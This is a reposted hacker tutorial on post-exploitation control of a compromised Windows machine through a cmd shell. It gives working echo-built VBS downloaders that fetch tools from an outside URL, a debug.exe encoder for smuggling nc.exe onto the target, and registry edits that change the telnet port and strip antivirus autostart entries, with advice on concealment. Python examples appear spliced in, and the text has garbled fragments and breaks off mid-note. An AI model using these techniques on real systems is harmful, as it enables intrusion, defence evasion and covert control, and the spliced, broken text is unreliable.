Command Line Interaction

Source: Internet
Author: User
Tags: echo command

Directory
1. Preface
2. File Transfer
3. System Configuration
4. Network Configuration
5. Software Installation
6. Windows scripts
7. Postscript


Preface
Cmd shell (command-line interaction) is an eternal topic for hackers and has a long history. This article introduces and summarizes some methods of controlling a Windows system from the command line. As far as possible, these methods use only the tools built into the system.


File Transfer
The biggest problem with a cmd shell obtained through an overflow vulnerability is how to upload files. Because of the prevalence of worms, ports 139 and 445, which are needed to connect to ipc$, are blocked by routers. In addition, Windows XP tightens the protection of ipc$, so uploading through ipc$ and the default shares is basically ineffective. Ftp and tftp are two feasible methods; they are well known and are not described here. There are three other methods that may be less familiar, which I summarize below:

1. Use the echo command to write an ASP Trojan.
The premise is that IIS is installed on the target host.
ASP Trojans are generally large and not suited to being written directly with echo, so here I provide a small one.
The echo version is given directly:

@echo ^>up.asp

Note that this is a single line with no carriage return in the middle.
The generated up.asp cannot be accessed with a browser; it can only be used together with its client script.

2. Use echo to write a VBS script that downloads files.
Write the download script dl.vbs with a few echo commands (the angle brackets and the ampersand inside the echoed text are escaped with ^ so that cmd does not treat them as redirections or command separators):

@echo with wscript:if .arguments.count^<2 then .quit>dl.vbs
@echo set aso=.createobject("adodb.stream"):set w=.createobject("microsoft.xmlhttp")>>dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"^&w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with>>dl.vbs

Example: download ps.exe and save it as c:\path\ps.exe:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this is executed in the remote shell.

3. Echo an encoded file and restore it with debug.exe.
Neither of the two preceding methods can pass through a firewall. In addition, except on a web server you run yourself, web resources are usually provided as compressed archives; if the target host has no decompression tool, they are useless. So we need a "killer" method.

With the redirection operator, echo can write any character whose ASCII code is below 128, but not bytes of 128 or above. So if the local file is first re-encoded into printable characters, it can easily be written to the remote host with echo alone. The first encoding that comes to mind is base64, the encoding used for e-mail attachments. However, vbs does not support bitwise operations, so encoding and decoding are complicated. What is more troublesome is that scripts handle binary streams poorly. (ADODB.Stream can write files in binary mode, but I could not construct the corresponding data type. A binary stream can be converted to a string with the midb function, but not the other way round. I spent two days on this without solving it. If anyone knows how to write arbitrary bytes to a file with vbs or js, please let me know.)

Instead, all you need is debug.exe. Many people know the principle, so I will not explain it and give the encoding script directly:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """ _>>debug.vbs"&vbcrlf&"@echo +"""
next
.writeline """>>debug.vbs"&vbcrlf&"@echo with wscript.stdout:r=vbcrlf" _
&":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)" _
&":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""&hex(slh)&"""+r+""rcx""+r+"""&hex(sll) _
&"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with>>debug.vbs&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp """&fn&"""&del debug.vbs"
end with

Save it as echo.vbs. To upload nc.exe, run the following on the local command line:

cscript echo.vbs nc.exe

You can also drag and drop the icon of the file to be transferred to the icon of the script file.
A moment later, nc.exe.bat is generated in the current directory. Open it with Notepad or another editor and you will see content like this:

@echo str="..." _>>debug.vbs
@echo +"..." _>>debug.vbs
@echo +"..." _>>debug.vbs
@echo +"..." _>>debug.vbs
............
............ (rows omitted; each "..." stands for 256 hex digits)
............
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp "nc.exe"&del debug.vbs

Select all, copy, switch to the remote command-line window and paste.
If the network is not slow, the whole upload takes about 20 seconds.

Notes:
1. Transferring large files is unstable and may kill the shell. The smaller the file, the better; we recommend that the original file not exceed kb.
2. Before transferring a large file, upload a small one first so that the 16-bit virtual machine ntvdm.exe stays resident in the background. After all files have been uploaded, kill the ntvdm process for concealment.
3. In some cmd shells each command line is followed by two extra carriage returns, so nc.exe.bat cannot be used directly; paste its contents instead.
4. The length of a single command is limited, so one echo cannot do the whole job. Moreover, in the cmd shell provided by nc, an over-long command makes the shell exit (an overflow?). You can change the 128 in the "i mod 128=0" statement to adjust the length of each echo command; each echo carries twice that many characters, since every byte becomes two hex digits.
5. The decoding itself involves no script; the script is only there to reduce the amount of data transmitted (it is compressed). If I have time I will write a better script with stronger compression and a data-validation function.
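To see exactly what the pasted commands produce before using them against a target, here is an added example in Python (not the article's code, which is VBScript plus debug.exe). It reproduces the encoder's output, builds the debug.exe script that debug.vbs prints on the target, and simulates the debug.exe commands involved (e, rbx, rcx, n, w, q) so the round trip can be verified offline, which is the validation step note 5 above says is missing. The function names, the 24-byte "e" line width (the article's "step 48") and the 65280-byte limit derived from debug.exe's 16-bit offsets are the example's own assumptions; the payload is constructed.

```python
from typing import List, Optional, Tuple

DEBUG_ORG = 0x100                  # debug.exe keeps the file image at offset 0100
DEBUG_MAX = 0x10000 - DEBUG_ORG    # 16-bit offsets: at most 65280 bytes in one image (assumption)
BYTES_PER_E = 24                   # 48 hex digits per "e" line (the article's "step 48")

# Constructed payload standing in for nc.exe; neither a multiple of 128 nor of 24 bytes.
SAMPLE = bytes(range(256)) * 2 + b"MZ"


def hex_chunks(data: bytes, bytes_per_echo: int = 128) -> List[str]:
    """Upper-case hex of data, one chunk per echo command (the article's
    "i mod 128 = 0", so each echo carries 256 characters)."""
    hexstr = data.hex().upper()
    step = bytes_per_echo * 2
    return [hexstr[i:i + step] for i in range(0, len(hexstr), step)] or [""]


def make_bat(data: bytes, name: str, bytes_per_echo: int = 128) -> List[str]:
    """The lines of <file>.bat that the VBS generator writes. Pasted into the remote
    shell they rebuild debug.vbs there, feed it to debug.exe and rename the result."""
    chunks = hex_chunks(data, bytes_per_echo)
    size = len(data)
    lines = [f'@echo str="{chunks[0]}" _>>debug.vbs']
    lines += [f'@echo +"{c}" _>>debug.vbs' for c in chunks[1:]]
    lines.append('@echo +"">>debug.vbs')
    lines.append('@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:'
                 '.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:'
                 '.write " "+mid(str,j,2):next:.write r:next>>debug.vbs')
    lines.append(f'@echo .write "rbx"+r+"{size >> 16:X}"+r+"rcx"+r+"{size & 0xFFFF:X}"'
                 '+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs'
                 f'&cscript //nologo debug.vbs|debug.exe>nul&ren debug.tmp "{name}"&del debug.vbs')
    return lines


def make_debug_script(data: bytes, tmp_name: str = "debug.tmp") -> str:
    """What debug.vbs prints on the target, i.e. the stdin debug.exe consumes:
    one "e" line per 24 bytes, then BX:CX = length, the file name, write, quit."""
    if len(data) > DEBUG_MAX:
        raise ValueError(f"{len(data)} bytes exceed the {DEBUG_MAX}-byte image debug.exe can write")
    lines = [f"e{DEBUG_ORG + off:X} " + " ".join(f"{b:02X}" for b in data[off:off + BYTES_PER_E])
             for off in range(0, len(data), BYTES_PER_E)]
    size = len(data)
    lines += ["rbx", f"{size >> 16:X}", "rcx", f"{size & 0xFFFF:X}", "n " + tmp_name, "w", "q"]
    return "\r\n".join(lines) + "\r\n"


def run_debug_script(script: str) -> Tuple[Optional[str], Optional[bytes]]:
    """Minimal model of the debug.exe commands the script uses: e (enter bytes at an
    address), rbx/rcx (the new register value follows on the next line), n (file name),
    w (write BX:CX bytes starting at offset 0100), q. Returns (file name, bytes written)."""
    mem = bytearray(0x10000)
    regs = {"bx": 0, "cx": 0}
    pending = None
    name, written = None, None
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if pending:                                  # value line answering "rbx"/"rcx"
            regs[pending] = int(line, 16)
            pending = None
            continue
        cmd, rest = line[0].lower(), line[1:].strip()
        if cmd == "e":
            addr, *hexbytes = rest.split()
            start = int(addr, 16)
            if start + len(hexbytes) > len(mem):
                raise ValueError("e command runs past the 64 KB segment")
            for k, h in enumerate(hexbytes):
                mem[start + k] = int(h, 16)
        elif cmd == "r":
            pending = rest.lower()
        elif cmd == "n":
            name = rest
        elif cmd == "w":
            length = (regs["bx"] << 16) | regs["cx"]
            written = bytes(mem[DEBUG_ORG:DEBUG_ORG + length])
        elif cmd == "q":
            break
        else:
            raise ValueError("unsupported debug command: " + line)
    return name, written


def round_trip_ok(data: bytes) -> bool:
    """Encode, run through the simulated debug.exe, and compare with the input."""
    return run_debug_script(make_debug_script(data)) == ("debug.tmp", data)


if __name__ == "__main__":
    print("\n".join(make_bat(SAMPLE, "nc.exe")[:2]))
    print("round trip:", round_trip_ok(SAMPLE))
```

The size guard in make_debug_script is the reason the article's note 1 prefers small files: debug.exe addresses a single 64 KB segment, so anything larger than the image starting at offset 0100 cannot be written in one pass with this script.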

Of course, once files can be uploaded everything becomes easy, but many tasks can be done with the tools Windows already provides. When looking for the tools you need, do not forget Windows itself.


System Configuration
This section includes three aspects: Registry, service, and group policy.

Let's talk about the Registry first. Many command-line tools for accessing the registry are interactive; a shell produced by an overflow cannot redirect its input/output streams a second time, so they cannot be used.
The system's own regedit.exe works well.

1. Read the Registry
Export the registry key you want to query and view it with type, for example:

C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

C:\>type 1.reg | find "PortNumber"
"PortNumber"=dword:00000d3d

C:\>del 1.reg

So the terminal service port is 3389 (hexadecimal d3d). Regedit writes the exported file in Unicode; type converts it when its output is piped, so find still works.

2. Modify/Delete the registry key.
First echo a .reg file and then import it, for example:

>1.reg echo Windows Registry Editor Version 5.00
>>1.reg echo.
>>1.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]
>>1.reg echo "TelnetPort"=dword:00000913
>>1.reg echo "NTLM"=dword:00000001
>>1.reg echo.
regedit /s 1.reg

This changes the telnet service port to 2323 (hexadecimal 913) and sets the NTLM authentication mode to 1. The first line creates the file with > and the others append with >>. The redirection is placed at the front of each line on purpose: written as echo "NTLM"=dword:00000001>>1.reg, cmd would take the digit in front of >> as a file-handle number and drop it from the output.

To delete a key, put a minus sign in front of the key name, for example:

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

To delete a value, put a minus sign after the equals sign, for example:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-
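As an added example covering both the export-and-read step and the echo-and-import step above (this is example code, not part of the article), the following Python parses the text regedit /e writes, so a value such as "PortNumber"=dword:00000d3d is read as 3389 without type and find, builds the .reg text for adding and deleting keys and values, and turns it into the redirection-first echo commands. The sample export is constructed; only PortNumber and the key names come from the article, and the function names are the example's own.

```python
import re
from typing import Dict, List, Optional

REG_HEADER = "Windows Registry Editor Version 5.00"
RegValues = Optional[Dict[str, object]]      # None = delete the whole key

# Constructed sample in the format regedit /e writes; only PortNumber comes from the
# article, the other entries are made up to exercise the parser.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"WorkDirectory"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,00,00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-
"""


def _unescape(s: str) -> str:
    return re.sub(r'\\(["\\])', r"\1", s)         # \\ -> \  and  \" -> "


def _decode_value(v: str) -> object:
    if v == "-":                                   # "name"=-  deletes the value
        return None
    if len(v) >= 2 and v[0] == '"' and v[-1] == '"':
        return _unescape(v[1:-1])                  # REG_SZ
    if v.startswith("dword:"):
        return int(v[6:], 16)                      # REG_DWORD, eight hex digits
    m = re.match(r"^hex(?:\((\d+)\))?:(.*)$", v)
    if m:
        raw = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        if m.group(1) == "2":                      # REG_EXPAND_SZ: UTF-16LE, NUL-terminated
            return raw.decode("utf-16-le").rstrip("\x00")
        return raw                                 # REG_BINARY and other hex(n): raw bytes
    raise ValueError("unsupported .reg value: " + v)


def parse_reg(text: str) -> Dict[str, RegValues]:
    """regedit /e output -> {key: {name: value}}; [-key] and "name"=- map to None.
    A real export is UTF-16LE with a BOM (open it with encoding="utf-16")."""
    logical: List[str] = []
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if logical and logical[-1].endswith("\\"):   # hex data continued with ",\"
            logical[-1] = logical[-1][:-1] + line
        else:
            logical.append(line)
    keys: Dict[str, RegValues] = {}
    current = None
    for line in logical:
        if not line or line == REG_HEADER or line.startswith(";"):
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            if current.startswith("-"):
                keys[current[1:]] = None
                current = None
            else:
                keys.setdefault(current, {})
            continue
        m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if current is None or not m:
            raise ValueError("malformed .reg line: " + line)
        name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        keys[current][name] = _decode_value(m.group(2))
    return keys


def build_reg(changes: Dict[str, RegValues]) -> str:
    """.reg text for regedit /s: key -> None emits [-key], value -> None emits "name"=-,
    int becomes dword:, bytes becomes hex:, anything else a quoted string."""
    def quote(s: str) -> str:
        return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'
    out = [REG_HEADER, ""]
    for key, values in changes.items():
        if values is None:
            out += ["[-" + key + "]", ""]
            continue
        out.append("[" + key + "]")
        for name, val in values.items():
            if val is None:
                rhs = "-"
            elif isinstance(val, int):
                rhs = "dword:%08x" % (val & 0xFFFFFFFF)
            elif isinstance(val, bytes):
                rhs = "hex:" + ",".join("%02x" % b for b in val)
            else:
                rhs = quote(str(val))
            out.append(("@" if name == "" else quote(name)) + "=" + rhs)
        out.append("")
    return "\r\n".join(out) + "\r\n"


def to_echo_commands(reg_text: str, filename: str = "1.reg") -> List[str]:
    """One cmd line per .reg line, redirection first: as echo "NTLM"=dword:00000001>>1.reg
    cmd would read the digit before >> as a file handle. Blank lines become echo. and
    the cmd metacharacters & | < > ^ are escaped with ^."""
    cmds = []
    for i, line in enumerate(reg_text.splitlines()):
        redir = (">" if i == 0 else ">>") + filename          # > creates, >> appends
        body = re.sub(r"([&|<>^])", r"^\1", line)
        cmds.append(redir + " echo" + ("." if not body else " " + body))
    cmds.append("regedit /s " + filename)
    return cmds
```

parse_reg(build_reg(changes)) returns the same dictionary, which is a cheap way to check a hand-written change set before echoing it into the remote shell.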

3. Use the inf file to access the registry.
The three registry operations above can also be done with the following inf file (the flag 0x00010001 marks the value as a REG_DWORD):

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTE \CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun

Write it to c:\path\reg.inf and run the following command to "install" it:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf

Notes:
1. [Version] and [DefaultInstall] are required, and there must be at least one of AddReg and DelReg. My_AddReg_Name and My_DelReg_Name can be

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.
